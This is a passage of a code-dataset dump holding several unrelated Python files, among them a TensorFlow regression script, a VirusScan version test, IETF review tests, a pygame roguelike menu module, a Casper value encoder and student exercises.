#\n\n # initialise weight matrix and bias for fully connected linear layer\n W_0 = tf.get_variable(\"w0\", dtype=tf.float32, shape=[17, 10], initializer=tf.contrib.layers.xavier_initializer())\n b_0 = tf.get_variable(\"b0\", dtype=tf.float32, shape=[1, 10], initializer=tf.contrib.layers.xavier_initializer())\n\n y_0 = tf.matmul(x, W_0) + b_0\n\n #relu_0 = tf.nn.relu(y_0)\n\n # initialise weight matrix and bias for fully connected linear layer\n W_1 = tf.get_variable(\"w1\", dtype=tf.float32, shape=[10, 5], initializer=tf.contrib.layers.xavier_initializer())\n b_1 = tf.get_variable(\"b1\", dtype=tf.float32, shape=[1, 5], initializer=tf.contrib.layers.xavier_initializer())\n\n y_1 = tf.matmul(y_0, W_1) + b_1\n\n relu_1 = tf.nn.relu(y_1)\n\n # initialise weight matrix and bias for fully connected linear layer\n W_2 = tf.get_variable(\"w2\", dtype=tf.float32, shape=[5, 1], initializer=tf.contrib.layers.xavier_initializer())\n b_2 = tf.get_variable(\"b2\", dtype=tf.float32, shape=[1, 1], initializer=tf.contrib.layers.xavier_initializer())\n\n y_2 = tf.matmul(relu_1, W_2) + b_2\n\n relu_2 = tf.nn.relu(y_2)\n\n\n #model_softmax = tf.nn.softmax(y_0) # apply softmax to the linear layer\n\n loss = tf.losses.mean_squared_error(relu_2, y_) # compute cross-entropy loss on the linear output (softmax applied internally)\n\n\n\n update = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss) # optimise to minimise loss via gradient descent\n\n #correct_preds = tf.equal(tf.argmax(model_softmax, 1), tf.argmax(y_, 1))\n get_accuracy = tf.metrics.mean_squared_error(relu_2, y_)\n\n get_prediction = [relu_2, y_]\n #get_accuracy = tf.reduce_mean(tf.cast(correct_preds, tf.float32)) # calculate the accuracy score\n\n #####################################################\n\n # Train.\n i, train_accuracy, test_accuracy = 0, [], []\n log_period_updates = int(log_period_samples / batch_size)\n with tf.train.MonitoredSession() as sess:\n while i < 1600:\n\n # Update.\n i 
+= 1\n batch_xs, batch_ys = mnist()\n\n #################\n # Training step #\n sess.run(update, feed_dict={x: batch_xs, y_: batch_ys}) # run the gradient descent update\n\n #################\n\n # Periodically evaluate.\n if i % log_period_updates == 0:\n #####################################\n # Compute and store train accuracy. #\n\n temp_accuracy = sess.run(get_accuracy,\n feed_dict={x: batch_xs, y_: batch_ys}) # get the accuracy\n\n train_accuracy.append(temp_accuracy[1]) # append it to the list\n\n\n\n batch_xs, batch_ys = mnist.all()\n\n predictions = sess.run(get_prediction,\n feed_dict={x: batch_xs, y_: batch_ys})\n\n\n\n #####################################\n #experiments_task1.append(train_accuracy)\n #experiments_task1.append(\n #((num_epochs, learning_rate), train_accuracy, test_accuracy))\n'''train_plot = []\nfor i in train_accuracy:\n train_plot.append(i[1])\n\ntest_plot = []\nfor i in test_accuracy:\n test_plot.append(i[1])'''\n\nplt.plot(np.arange(len(train_accuracy)), train_accuracy, label = 'train')\nplt.legend()\n\nplt.show()\n\n'''pred_0 = []\npred_1 = []\nfor i in predictions[0]:\n pred_0.append(i)\nfor j in predictions[1]:\n pred_1.append(j)\nplt.plot(np.arange(len(pred_0)), pred_0, label = 'pred')\nplt.plot(np.arange(len(pred_1)), pred_1, label = 'label')\nplt.legend()\nplt.show()'''\nplt.plot(np.arange(len(predictions[0])), predictions[0], label = 'pred')\nplt.plot(np.arange(len(predictions[1])), predictions[1], label = 'label')\nplt.grid()\nplt.legend()\nplt.show()\n\n\nplt.plot(np.arange(len(predictions[0])), predictions[0], label = 'pred')\nplt.plot(np.arange(len(predictions[1])), predictions[1], label = 'label')\nplt.grid()\nplt.legend()\n\nplt.savefig('price_chart.eps', format='eps', dpi=1000)\n","sub_path":"ML_keep.py","file_name":"ML_keep.py","file_ext":"py","file_size_in_byte":7791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"356974814","text":"#!/usr/bin/env python\n# 
Copyright (C) 2010 McAfee, Inc. All rights reserved.\n# TestcaseID: lsh-1882\n# TestcaseDescription: Testcase to verify the installed version of VirusScan Enterprise for Linux\n\nimport sys\nimport logging\nimport re\n# Add common folder into the sys path for module importing\nsys.path.append(\"./Common\")\nsys.path.append(\"..\")\n#import commonFns\n#import commonOASFns\n#import commonAntiMalwareFns\nimport subprocess\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\ntestcaseName = sys.argv[0][:-3]\n\nclass TestCase(BaseTest):\n def __init__(self):\n logging.info(\"Testcase ID : LSH-1882\")\n logging.info(\"Description : Testcase to verify the installed version of VirusScan Enterprise for Linux\")\n self.expected = '1.7.0'\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n # Call the common initialization check\n _retval = BaseTest.init(self)\n if _retval != 0 :\n return _retval\n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n try :\n _info = commonAntiMalwareFns.getProductInfo()\n if not _info :\n logging.error(\"Failed to retrieve product info\")\n return 1\n self._actual = _info['version']\n except :\n logging.error(\"Exception occured while running the task\")\n return 1\n return 0\n def verify(self):\n \n if self.expected == self._actual :\n logging.info(\"The installed product version matched with the exisiting version\")\n return 0\n else :\n logging.error(\"The installed build version(%s) does not match with the available built version(%s)\" %(self.line, self.productVersion))\n return 1\n return 0\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n \n # Copy logs and clean them.\n commonFns.cleanLogs()\n return 0\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = 
testObj.init()\n\n # Perform execute once initialization succeeds... \n if(retVal == 0):\n retVal = testObj.execute()\n \n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal = retVal + testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n \n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n","sub_path":"McAfee/src/VSEL - TestAutomation/Testcases/Common/VselProductCheck.py","file_name":"VselProductCheck.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"92062747","text":"#Oppgave 2.1\ni=1\ntallene = []\nwhile i !=0: #Naar bruker legg inn 0 lokken stopper\n\ti=int(input(\"legg inn:\\n\"))\n\ttallene.append(i)\n\tif i==0:\n\t\tprint(\"Funnet\")\n\n#Skriver ut taller i listen\nfor tall in tallene:\n\tprint(tall)\n\n#Skriver ut summen av tallene i listen\nminSum=0\nfor tall in tallene:\n\tminSum+=tall\nprint (\"Summen er: \"+str(minSum))\n\n#Skriver ut minstetallen i listen\nminstetall=tallene[0]\nfor tall in tallene:\n\tif tallstorstetall:\n\t\tstorstetall=tall\n\t\t\n#Printer minstetallen og storstetallen\nprint(\"Mistetallet er: \"+str(minstetall))\nprint(\"Størstetallet er: \"+str(storstetall))","sub_path":"IN1000 v17 Python/OBLIG4/regnelokke.py","file_name":"regnelokke.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"276679291","text":"# Copyright The IETF Trust 2019-2020, All Rights Reserved\n# -*- coding: utf-8 -*-\n\n\nfrom ietf.review.factories import ReviewAssignmentFactory, ReviewRequestFactory\nfrom ietf.utils.test_utils import TestCase, reload_db_objects\nfrom .mailarch import hash_list_message_id\n\nclass HashTest(TestCase):\n\n def test_hash_list_message_id(self):\n for list, msgid, 
hash in (\n ('ietf', '156182196167.12901.11966487185176024571@ietfa.amsl.com', 'lr6RtZ4TiVMZn1fZbykhkXeKhEk'),\n ('codesprints', 'E1hNffl-0004RM-Dh@zinfandel.tools.ietf.org', 'N1nFHHUXiFWYtdzBgjtqzzILFHI'),\n ('xml2rfc', '3A0F4CD6-451F-44E2-9DA4-28235C638588@rfc-editor.org', 'g6DN4SxJGDrlSuKsubwb6rRSePU'),\n (u'ietf', u'156182196167.12901.11966487185176024571@ietfa.amsl.com','lr6RtZ4TiVMZn1fZbykhkXeKhEk'),\n (u'codesprints', u'E1hNffl-0004RM-Dh@zinfandel.tools.ietf.org', 'N1nFHHUXiFWYtdzBgjtqzzILFHI'),\n (u'xml2rfc', u'3A0F4CD6-451F-44E2-9DA4-28235C638588@rfc-editor.org','g6DN4SxJGDrlSuKsubwb6rRSePU'),\n (b'ietf', b'156182196167.12901.11966487185176024571@ietfa.amsl.com','lr6RtZ4TiVMZn1fZbykhkXeKhEk'),\n (b'codesprints', b'E1hNffl-0004RM-Dh@zinfandel.tools.ietf.org', 'N1nFHHUXiFWYtdzBgjtqzzILFHI'),\n (b'xml2rfc', b'3A0F4CD6-451F-44E2-9DA4-28235C638588@rfc-editor.org','g6DN4SxJGDrlSuKsubwb6rRSePU'),\n ):\n self.assertEqual(hash, hash_list_message_id(list, msgid))\n \n\nclass ReviewAssignmentTest(TestCase):\n def do_test_update_review_req_status(self, assignment_state, expected_state):\n review_req = ReviewRequestFactory(state_id='assigned')\n ReviewAssignmentFactory(review_request=review_req, state_id='part-completed')\n assignment = ReviewAssignmentFactory(review_request=review_req)\n\n assignment.state_id = assignment_state\n assignment.save()\n review_req = reload_db_objects(review_req)\n self.assertEqual(review_req.state_id, expected_state)\n\n def test_update_review_req_status(self):\n # Test change\n for assignment_state in ['no-response', 'rejected', 'withdrawn', 'overtaken']:\n self.do_test_update_review_req_status(assignment_state, 'requested')\n # Test no-change\n for assignment_state in ['accepted', 'assigned', 'completed', 'part-completed', 'unknown', ]:\n self.do_test_update_review_req_status(assignment_state, 'assigned')\n\n def test_no_update_review_req_status_when_other_active_assignment(self):\n # If there is another still active assignment, do not 
update review_req state\n review_req = ReviewRequestFactory(state_id='assigned')\n ReviewAssignmentFactory(review_request=review_req, state_id='assigned')\n assignment = ReviewAssignmentFactory(review_request=review_req)\n\n assignment.state_id = 'no-response'\n assignment.save()\n review_req = reload_db_objects(review_req)\n self.assertEqual(review_req.state_id, 'assigned')\n\n def test_no_update_review_req_status_when_review_req_withdrawn(self):\n # review_req state must only be changed to \"requested\", if old state was \"assigned\",\n # to prevent reviving dead review requests\n review_req = ReviewRequestFactory(state_id='withdrawn')\n assignment = ReviewAssignmentFactory(review_request=review_req)\n\n assignment.state_id = 'no-response'\n assignment.save()\n review_req = reload_db_objects(review_req)\n self.assertEqual(review_req.state_id, 'withdrawn')\n","sub_path":"ietf/review/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323573268","text":"import os\nimport sys\nimport json\nimport base64\nimport zipfile\nfrom imageio import imread, imwrite\n\nwith open(sys.argv[1]) as data_file:\n data = json.load(data_file)\n\nif not os.path.exists(sys.argv[1].split('.')[0] + \".json\"):\n cnt = 0\n check = []\n tmp = None\n d = {}\n for x in data[\"log\"][\"entries\"]:\n found = False\n if \"d2vs6ffylckc3p.cloudfront.net/manga\" in x[\"request\"][\"url\"]:\n found = True\n if not found:\n continue\n else:\n if \"content\" not in x[\"response\"]:\n continue\n elif x[\"response\"][\"content\"][\"mimeType\"] != \"image/jpeg\" or x[\"response\"][\"content\"][\"encoding\"] != \"base64\":\n continue\n else:\n if x[\"response\"][\"content\"][\"text\"] not in check:\n check.append(x[\"response\"][\"content\"][\"text\"])\n d[cnt] = x[\"response\"][\"content\"][\"text\"]\n cnt += 1\n\n json.dump(d, open(sys.argv[1].split('.')[0] + \".json\", \"w\"), 
indent=4, sort_keys=True)\n print(sys.argv[1].split('.')[0] + \".json\" + \" done.\")\n","sub_path":"HPJ/reduce.py","file_name":"reduce.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"403469171","text":"import typing\n\nimport pycspr.serialisation.byte_array.encoder.cl_complex as complex_encoder\nimport pycspr.serialisation.byte_array.encoder.cl_primitive as primitives_encoder\nimport pycspr.serialisation.byte_array.encoder.cl_type as type_encoder\nfrom pycspr.types import CLTypeKey\nfrom pycspr.types import CLValue\n\n\n\n# Map: CL type <-> encoder.\nENCODERS = {\n CLTypeKey.ANY: complex_encoder.encode_any,\n CLTypeKey.BOOL: primitives_encoder.encode_bool,\n CLTypeKey.BYTE_ARRAY: primitives_encoder.encode_byte_array,\n CLTypeKey.I32: primitives_encoder.encode_i32,\n CLTypeKey.I64: primitives_encoder.encode_i64,\n CLTypeKey.KEY: complex_encoder.encode_storage_key,\n CLTypeKey.LIST: complex_encoder.encode_list, \n CLTypeKey.MAP: complex_encoder.encode_map, \n CLTypeKey.OPTION: complex_encoder.encode_option, \n CLTypeKey.PUBLIC_KEY: complex_encoder.encode_public_key,\n CLTypeKey.STRING: primitives_encoder.encode_string,\n CLTypeKey.TUPLE_1: complex_encoder.encode_tuple1,\n CLTypeKey.TUPLE_2: complex_encoder.encode_tuple2,\n CLTypeKey.TUPLE_3: complex_encoder.encode_tuple3,\n CLTypeKey.U8: primitives_encoder.encode_u8,\n CLTypeKey.U32: primitives_encoder.encode_u32,\n CLTypeKey.U64: primitives_encoder.encode_u64,\n CLTypeKey.U128: primitives_encoder.encode_u128, \n CLTypeKey.U256: primitives_encoder.encode_u256,\n CLTypeKey.U512: primitives_encoder.encode_u512,\n CLTypeKey.UNIT: primitives_encoder.encode_unit,\n CLTypeKey.RESULT: complex_encoder.encode_result,\n CLTypeKey.UREF: complex_encoder.encode_uref,\n}\n\n\ndef encode(value: CLValue) -> bytes:\n \"\"\"Encodes a CL value as an array of bytes.\n\n :param value: A CL value that encapsulates both the associated CL 
type & it's pythonic value representation.\n :returns: A byte array representation conformant to CL serialisation protocol.\n \n \"\"\"\n encoder = ENCODERS[value.cl_type.typeof]\n if value.cl_type.typeof in {CLTypeKey.LIST, CLTypeKey.OPTION}:\n return encoder(value.parsed, ENCODERS[value.cl_type.inner_type.typeof])\n else:\n return encoder(value.parsed)\n\n\ndef encode_cl_value(entity: CLValue) -> bytes:\n \"\"\"Encodes a CL value.\n \n \"\"\"\n return primitives_encoder.encode_u8_array(encode(entity)) + \\\n type_encoder.encode_cl_type(entity.cl_type)\n","sub_path":"pycspr/serialisation/byte_array/encoder/cl_value.py","file_name":"cl_value.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"575173597","text":"# standard libraries\nimport pygame\nimport sys\n\n# game files\nfrom bfrl import constants\nfrom bfrl import draw\nfrom bfrl import maps\nfrom bfrl import game\nfrom bfrl import globals\n\n\ndef main():\n\n # UI Addresses\n center_x, center_y = (constants.CAMERA_WIDTH / 2, constants.CAMERA_HEIGHT / 2)\n game_tile_x, game_tile_y = (center_x, center_y - 260)\n footer_x, footer_y = (center_x - 500, constants.CAMERA_HEIGHT - 10)\n continue_x, continue_y = (center_x, center_y + 240)\n new_game_x, new_game_y = (center_x, continue_y + 40)\n options_x, options_y = (center_x, new_game_y + 40)\n exit_x, exit_y = (center_x, options_y + 40)\n\n game_title = {\n 'display_surface': globals.SURFACE_MAIN,\n 'text_to_display': 'PythonRL',\n 'font': constants.FONT_TITLE_SCREEN,\n 'coordinates': (game_tile_x, game_tile_y),\n 'text_color': constants.COLOR_WHITE,\n 'back_color': constants.COLOR_BLACK,\n 'alignment': 'center',\n }\n\n footer = {\n 'display_surface': globals.SURFACE_MAIN,\n 'text_to_display': 'music by icons8.com',\n 'font': constants.FONT_MESSAGE_TEXT,\n 'coordinates': (footer_x, footer_y),\n 'text_color': constants.COLOR_GREY,\n 'alignment': 'center',\n }\n\n 
continue_button_attributes = {\n 'surface': globals.SURFACE_MAIN,\n 'button_text': 'continue',\n 'size': (150, 35),\n 'center_coordinates': (continue_x, continue_y)\n }\n continue_button = draw.UIButton(**continue_button_attributes)\n\n new_game_button_attributes = {\n 'surface': globals.SURFACE_MAIN,\n 'button_text': 'new game',\n 'size': (150, 35),\n 'center_coordinates': (new_game_x, new_game_y)\n }\n new_game_button = draw.UIButton(**new_game_button_attributes)\n\n options_attributes = {\n 'surface': globals.SURFACE_MAIN,\n 'button_text': 'options',\n 'size': (150, 35),\n 'center_coordinates': (options_x, options_y)\n }\n options_button = draw.UIButton(**options_attributes)\n\n quit_button_attributes = {\n 'surface': globals.SURFACE_MAIN,\n 'button_text': 'quit game',\n 'size': (150, 35),\n 'center_coordinates': (exit_x, exit_y)\n }\n quit_button = draw.UIButton(**quit_button_attributes)\n\n # loads theme music\n pygame.mixer.music.load(globals.ASSETS.main_menu)\n pygame.mixer.music.play(loops=-1)\n\n menu_running = True\n while menu_running:\n\n list_of_events = pygame.event.get()\n mouse_position = pygame.mouse.get_pos()\n\n game_input = (list_of_events, mouse_position)\n\n for event in list_of_events:\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n # button updates\n if continue_button.update(game_input):\n pygame.mixer.music.stop()\n game.start(continue_game=True)\n\n if new_game_button.update(game_input):\n pygame.mixer.music.stop()\n game.start(continue_game=False)\n\n if options_button.update(game_input):\n options()\n\n if quit_button.update(game_input):\n pygame.mixer.music.stop()\n pygame.quit()\n sys.exit()\n\n # draw menu\n globals.SURFACE_MAIN.blit(globals.ASSETS.main_menu_bg, (0, 0))\n draw.text(**game_title)\n draw.text(**footer)\n\n # update surfaces\n continue_button.draw()\n new_game_button.draw()\n options_button.draw()\n quit_button.draw()\n pygame.display.update()\n\n\ndef options():\n\n window_center = (constants.CAMERA_WIDTH 
/ 2, constants.CAMERA_HEIGHT / 2)\n\n settings_menu_width = 200\n settings_menu_height = 200\n settings_menu_bg_color = constants.COLOR_DEFAULT_BG\n\n settings_menu_surface = pygame.Surface((settings_menu_width, settings_menu_height))\n settings_menu_rect = pygame.Rect(0, 0, settings_menu_width, settings_menu_width)\n settings_menu_rect.center = window_center\n menu_center_x, menu_center_y = settings_menu_rect.center\n\n # Define Sound Settings Slider\n slider_sound_text = {\n 'display_surface': globals.SURFACE_MAIN,\n 'text_to_display': 'sound',\n 'font': constants.FONT_MESSAGE_TEXT,\n 'coordinates': (menu_center_x, menu_center_y - 60),\n 'text_color': constants.COLOR_WHITE,\n 'alignment': 'center',\n }\n slider_sound_attributes = {\n 'size': (125, 15),\n 'surface': globals.SURFACE_MAIN,\n 'center_coordinates': (menu_center_x, menu_center_y - 40),\n 'color_background': constants.COLOR_WHITE,\n 'color_foreground': constants.COLOR_GREEN,\n 'value': globals.PREFERENCES.volume_sound\n }\n slider_sound = draw.UISlider(**slider_sound_attributes)\n\n # Define Music Settings Slider\n slider_music_text = {\n 'display_surface': globals.SURFACE_MAIN,\n 'text_to_display': 'music',\n 'font': constants.FONT_MESSAGE_TEXT,\n 'coordinates': (menu_center_x, menu_center_y),\n 'text_color': constants.COLOR_WHITE,\n 'alignment': 'center',\n }\n slider_music_attributes = {\n 'size': (125, 15),\n 'surface': globals.SURFACE_MAIN,\n 'center_coordinates': (menu_center_x, menu_center_y + 20),\n 'color_background': constants.COLOR_WHITE,\n 'color_foreground': constants.COLOR_GREEN,\n 'value': globals.PREFERENCES.volume_music\n }\n slider_music = draw.UISlider(**slider_music_attributes)\n\n # Create save globals.PREFERENCES button\n save_preferences_button_attributes = {\n 'surface': globals.SURFACE_MAIN,\n 'button_text': 'save',\n 'size': (100, 35),\n 'center_coordinates': (menu_center_x, menu_center_y + 70)\n }\n save_preferences_button = 
draw.UIButton(**save_preferences_button_attributes)\n\n menu_close = False\n while not menu_close:\n\n list_of_events = pygame.event.get()\n mouse_position = pygame.mouse.get_pos()\n\n game_input = (list_of_events, mouse_position)\n\n # for event in list_of_events:\n # if event.type == pygame.KEYDOWN:\n # if event.key == pygame.K_ESCAPE:\n # menu_close = True\n\n slider_sound.update(game_input)\n if globals.PREFERENCES.volume_sound != slider_sound.value:\n globals.PREFERENCES.volume_sound = slider_sound.value\n globals.ASSETS.sound_adjust()\n\n slider_music.update(game_input)\n if globals.PREFERENCES.volume_music != slider_music.value:\n globals.PREFERENCES.volume_music = slider_music.value\n globals.ASSETS.sound_adjust()\n\n if save_preferences_button.update(game_input):\n game.preferences_save()\n menu_close = True\n\n settings_menu_surface.fill(settings_menu_bg_color)\n globals.SURFACE_MAIN.blit(settings_menu_surface, settings_menu_rect.topleft)\n\n draw.text(**slider_sound_text)\n slider_sound.draw()\n\n draw.text(**slider_music_text)\n slider_music.draw()\n\n save_preferences_button.draw()\n\n pygame.display.update()\n\n\ndef pause():\n \"\"\"\n This menu pauses the game and displays a simple message\n \"\"\"\n\n menu_close = False\n\n window_width = constants.CAMERA_WIDTH\n window_height = constants.CAMERA_HEIGHT\n\n menu_text = 'PAUSED'\n menu_font = constants.FONT_DEBUG_MESSAGE\n\n text_height = draw.helper_text_height(menu_font)\n text_width = draw.helper_text_width(menu_font) * len(menu_text)\n\n text_location = (int(window_width/2 - text_width/2), int(window_height/2 - text_height/2))\n\n while not menu_close:\n events_list = pygame.event.get()\n for event in events_list:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_p:\n menu_close = True\n if event.key == pygame.K_ESCAPE:\n menu_close = True\n\n font_color = constants.COLOR_WHITE\n bg_color = constants.COLOR_BLACK\n draw.text(globals.SURFACE_MAIN, menu_text, 
constants.FONT_DEBUG_MESSAGE, text_location, font_color, bg_color)\n globals.CLOCK.tick(constants.GAME_FPS)\n pygame.display.flip()\n\n\ndef inventory():\n\n menu_width = 200\n menu_height = 200\n\n window_width = constants.CAMERA_WIDTH\n window_height = constants.CAMERA_HEIGHT\n\n menu_x = int(window_width/2 - menu_width/2)\n menu_y = int(window_height/2 - menu_height/2)\n\n menu_location = (menu_x, menu_y)\n\n menu_font = constants.FONT_MESSAGE_TEXT\n menu_text_height = draw.helper_text_height(menu_font)\n\n inventory_surface = pygame.Surface((menu_width, menu_height))\n\n menu_close = False\n while not menu_close:\n\n menu_font = constants.FONT_MESSAGE_TEXT\n menu_font_color = constants.COLOR_WHITE\n menu_bg_color = constants.COLOR_BLACK\n menu_mouse_over_bg = constants.COLOR_GREY\n\n # Clear the menu\n inventory_surface.fill(constants.COLOR_BLACK)\n\n # Collect list of item names\n item_list = [item.display_name for item in globals.PLAYER.container.inventory]\n\n # Get list of input events\n events_list = pygame.event.get()\n\n # Get mouse coordinates relative to inventory window\n mouse_x, mouse_y = pygame.mouse.get_pos()\n mouse_x_relative = mouse_x - menu_x\n mouse_y_relative = mouse_y - menu_y\n\n # Check if mouse is in the window\n mouse_in_window = (0 < mouse_x_relative < menu_width and 0 < mouse_y_relative < menu_height)\n\n # convert mouse height to inventory line\n mouse_line_selection = int(mouse_y_relative / menu_text_height)\n\n for event in events_list:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_i:\n menu_close = True\n if event.key == pygame.K_ESCAPE:\n menu_close = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1 and mouse_in_window and mouse_line_selection <= len(item_list):\n globals.PLAYER.container.inventory[mouse_line_selection].item.use()\n globals.CLOCK.tick(constants.GAME_FPS)\n # TODO keep inventory open if item is an equipment\n menu_close = True\n\n # Draw item list\n for line, name in 
enumerate(item_list):\n name_location = (0, 0 + line * menu_text_height)\n if line == mouse_line_selection and mouse_in_window:\n draw.text(inventory_surface, name, menu_font, name_location, menu_font_color, menu_mouse_over_bg)\n else:\n draw.text(inventory_surface, name, menu_font, name_location, menu_font_color, menu_bg_color)\n\n # Render Game\n\n draw.game()\n\n # Display Menu\n globals.SURFACE_MAIN.blit(inventory_surface, menu_location)\n globals.CLOCK.tick(constants.GAME_FPS)\n pygame.display.flip()\n\n\ndef tile_select(origin=None, max_range=None, ignore_walls=True, ignore_creatures=True, radius=None):\n \"\"\"\n This menu lets the player select a tile on the map.\n The game pauses, produces a screen rectangle, and returns the map address when the LMB is clicked.\n :return: (x,y) map address tuple\n \"\"\"\n\n menu_close = False\n while not menu_close:\n\n # get mouse position\n mouse_coordinates = pygame.mouse.get_pos()\n map_coordinate_x, map_coordinate_y = globals.CAMERA.window_to_map(mouse_coordinates)\n\n map_address_x = int(map_coordinate_x / constants.CELL_WIDTH)\n map_address_y = int(map_coordinate_y / constants.CELL_HEIGHT)\n\n if origin:\n list_of_tiles = maps.find_line(origin, (map_address_x, map_address_y))\n else:\n list_of_tiles = [(map_address_x, map_address_y)]\n\n if max_range:\n list_of_tiles = list_of_tiles[:max_range + 1]\n\n for i, (x, y) in enumerate(list_of_tiles):\n if i == 0:\n continue\n if not ignore_walls and globals.GAME.current_map.check_for_wall(x, y):\n list_of_tiles = list_of_tiles[:i + 1]\n break\n if not ignore_creatures and globals.GAME.current_map.check_for_creature(x, y):\n list_of_tiles = list_of_tiles[:i + 1]\n break\n\n # get button clicks\n events_list = pygame.event.get()\n for event in events_list:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_l:\n menu_close = True\n if event.key == pygame.K_ESCAPE:\n menu_close = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n return 
list_of_tiles[-1]\n\n # draw game first\n globals.SURFACE_MAIN.fill(constants.COLOR_DEFAULT_BG)\n globals.SURFACE_MAP.fill(constants.COLOR_DEFAULT_BG)\n\n globals.CAMERA.update()\n\n # draw the map first\n draw.map_surface(globals.GAME.current_map.map_tiles)\n for obj in globals.GAME.objects_on_map:\n obj.draw()\n\n # draw rectangle at mouse position on top of game\n if len(list_of_tiles) > 1:\n for tile in list_of_tiles[1:]:\n if tile == list_of_tiles[-1]:\n draw.tile_rect(tile, marker='X')\n else:\n draw.tile_rect(tile)\n\n # TODO: Show radius if len = 1\n if radius:\n area_of_effect = maps.find_radius(list_of_tiles[-1], radius)\n for x, y in area_of_effect:\n draw.tile_rect((x, y), tile_color=constants.COLOR_RED)\n\n else:\n draw.tile_rect((map_address_x, map_address_y), marker='X')\n\n # update main surface with the new map\n globals.SURFACE_MAIN.blit(globals.SURFACE_MAP, (0, 0), globals.CAMERA.rectangle)\n\n draw.debug()\n draw.messages()\n\n globals.CLOCK.tick(constants.GAME_FPS)\n pygame.display.flip()\n","sub_path":"bfrl/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":14018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"122087587","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 13 16:57:09 2019\r\n\r\n@author: VIJ Global\r\n\"\"\"\r\n\r\n\r\nbalance = int(input(\"please put your balance on your credit card: \"))\r\nannualInterestRate = float(input(\"please put your annual interest rate in decimal: \"))\r\n\r\nmonthlyInterestRate = annualInterestRate/12\r\ni = 0\r\nmonth = 0\r\ndiff = 0.01\r\n\r\nmonthlyPaymentLower = balance/12\r\nmonthlyPaymentUpper = (balance*(1 + monthlyInterestRate)**12)/12.0\r\namount= 0\r\nunit_balance = balance\r\nwhile abs(amount-balance) >= diff:\r\n balance = balance - amount + ((balance - amount) * monthlyInterestRate)\r\n if balance != 0 and i < 12:\r\n amount = (monthlyPaymentLower+monthlyPaymentUpper)/2\r\n i += 1\r\n print(\"month: 
\", month, \"amount: \",amount, \"my balance is: \", balance)\r\n else:\r\n break \r\n month += 1\r\namount = round (amount,2)\r\nprint (\"Lowest Payment: \", amount, \"after \", month, \" months\")\r\n\r\n\r\n\r\n\"\"\"___Real code without bisection___\r\namount = 0\r\ninit_balance = balance\r\nmonthlyInterestRate = annualInterestRate/12\r\n\r\nwhile balance > 0:\r\n for i in range(12):\r\n balance = balance - amount + ((balance - amount) * monthlyInterestRate)\r\n if balance > 0:\r\n amount += 10\r\n balance = init_balance\r\n elif balance <= 0:\r\n break\r\nprint('Lowest Payment:', amount)\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\"\"\"___Real code without bisection___\r\n\r\nbalance = int(input(\"please put your balance on your credit card: \"))\r\nannualInterestRate = float(input(\"please put your annual interest rate in decimal: \"))\r\n\r\nmonthlyInterestRate = annualInterestRate/12\r\n\r\nmonthlyPaymentLower = balance/12\r\nmonthlyPaymentUpper = (balance*(1+monthlyInterestRate)**12)/12.0\r\namount = (monthlyPaymentLower+monthlyPaymentUpper)/2\r\n\r\n\r\ninit_balance = balance\r\ndiff = 0.01\r\n\r\nwhile abs(amount-balance) >= diff:\r\n for i in range(12):\r\n balance = balance - amount + ((balance - amount) * monthlyInterestRate)\r\n print (amount)\r\n if balance > 0:\r\n amount += 10\r\n balance = init_balance\r\n elif balance <= 0:\r\n break\r\namount = round (amount,2)\r\nprint('Lowest Payment:', amount)\r\n\"\"\"","sub_path":"Projects/p3_w2.py","file_name":"p3_w2.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"490725802","text":"import logging, sys, os, time\nfrom configs import config\nimport paramiko\n\nsys.path.append(os.path.dirname(os.getcwd()))\n# from automation.config import HOSTNAME\n\ndef send_to_sftpserver(request, dir=None):\n # setup a SSHClient object\n user = request.request['user']\n if not dir:\n dir = os.path.join(config.DEFAULT_DIR, user)\n\n ssh 
